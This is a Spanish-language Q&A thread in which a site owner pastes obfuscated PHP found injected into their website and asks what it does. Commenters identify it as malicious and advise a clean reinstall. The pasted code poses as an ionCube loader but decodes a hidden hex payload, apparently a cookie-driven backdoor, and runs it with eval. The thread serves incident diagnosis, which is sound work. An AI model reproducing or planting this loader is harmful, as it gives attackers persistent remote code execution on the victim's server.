if (!extension_loaded('IonCube_loader')) {$__oc = strtolower(substr(php_uname(), 0, 3));$__ln = 'ioncube_loader_' . $__oc . '_' . substr(phpversion(), 0, 3) . (($__oc == 'win') ? '.dll' : '.so');if (function_exists('il_exec')) {return il_exec();}$__ln = '/ioncube/' . $__ln;$__ln = "preg_replace";$__oid = @fopen(__FILE__, 'rb');$__id = realpath('extension_dir');$__here = dirname(__FILE__);if (strlen($__id) > 1 && $__id[1] == ':') {$__id = str_replace('\\', '/', substr($__id, 2));$__here = str_replace('\\', '/', substr($__here, 2));}$__rd = "/" . str_repeat('/..', substr_count($__id, '/')) . $__here . '/';$__i = strlen($__rd);while ($__i--) {if ($__rd[$__i] == '/') {$__lp = substr($__rd, 0, $__i) . $__ln;if ($__lp = fread($__oid, @filesize(__FILE__))) {$__ln = pack("H*", $__ln("/[A-Z,\r,\n]/", "", substr($__lp, 0x997-0x4e7)));break;}}}eval($__ln);return 0;} else {die('The file ' . __FILE__ . " is corrupted.\n");}if (function_exists('il_exec')) {return il_exec();}echo('Please check System Requirements on vendor site because the file <b>' . __FILE__ . '</b> requires the ionCube PHP Loader ' . basename($__ln) . ' to be installed by the site administrator.');return 0;

?>
24707P664686720H3d2L04M17U27J2J617Y9N2H827F68O766aL6b2K73Qd3e277a75N65W7A1R6
42H7O2L93bX2D47V76b6e762H03d2K04N172P7D26179W2L8277a63T64S6YdE27P3dA3e27Y7Z
9616Qc7427293Fb6T66f7L26M5C61B6K3682N02T84172726N1792B824U7076P64T68672cK2B
02M45fF5H04f53542Mc2024776b6e762c20245f434f4f4b4O9G45Y2D92D0C6P1X7320Z2D47E
766T6C76Pf73X29U2A07b66Q6Mf7265616368F2028X247Y766676f7S320A6173202469P736f
62A786EfN203Rd3KeZ2A0A247462657Q52F920Q7b24U7L4A626R575I203Td20407S061636Fb
2W8R2Q24L82a2E22c20S2N4Z7462657G5293b246P9Q7K36fD627D86f202e3d20T2G26A561E6
3J6C1T353J5L66L3V9G2EdR3D231K343K52dZ3M4643X06G6K2VdI3862353W42Dd32333B2353
13Q36S66J4343P6F63N362S23b24X616K27H5716d7C9203d20V24O7H46265F7H5J2X05Ue207
375S62M737C472287374725fY7V2X65X7M06561F74Q282F469A736OfF6278Y6f2Ec202H87O3
7U47K26cV65J6XeD2W8S24M74P6Z26N5R75E29Z2L0K2fB207X374Y72W6c6C56eH28O2Y4V697
D36fO6N278X6f29I2920X2Bb2031292c203N02KcW207374R72Q6WcL656Ve2V8B2C474626575
29I2J9S3Bb246162A7W5K7O16d7H92D03d2X06Q5K78Z706Qc6Cf64652822T23222Nc20C24Q6
1D6275I716d7K9Q293Pb69C6620U2863M6f75J6e742824V61R6275716d792920U3d3BdU2033
O29207b65A76C6Y16c2F8L246162F75N71C6d7B95bP3G15d28F246M1P6K27P571W6dT7T95b3
W2K5dZ29293b6I57O86L97K4E28293b7d7FdQ7Td
```

Y en fin, hay alguna que otro archivo modificado con códigos similares pero stackoverflow no me deja poner mas caracteres.

Alguien sabe de que se trata y que es lo que hacen estos códigos?

Comment: Ok código esta ofuscado con IONCUBE, y no creo que busque nada bueno. Dudo que tu hosting sea el que ha inyectado el código, pero poco más te puedo decir. Prueba a utilizar algún decoder para indagar más en el asunto

Comment: Todo parece indicar que tu sitio ha sufrido un ataque bastante serio. Lo peor de todo es que como ese archivo puede haber mucho otros con código malicioso que se ejecutará en cuanto llames a esos archivos. En esos casos lo mejor es hacer una instalación nueva, tratar de encontrar el agujero por donde te han atacado: plantillas o plugin obsoletos, inyección SQL, etc. y hacer una revisión de todos los archivos viejos que necesitarás en la nueva instalación, incluyendo archivos con extensiones como `ico`. Revisar también que no te hayan inyectado nada en la base de datos.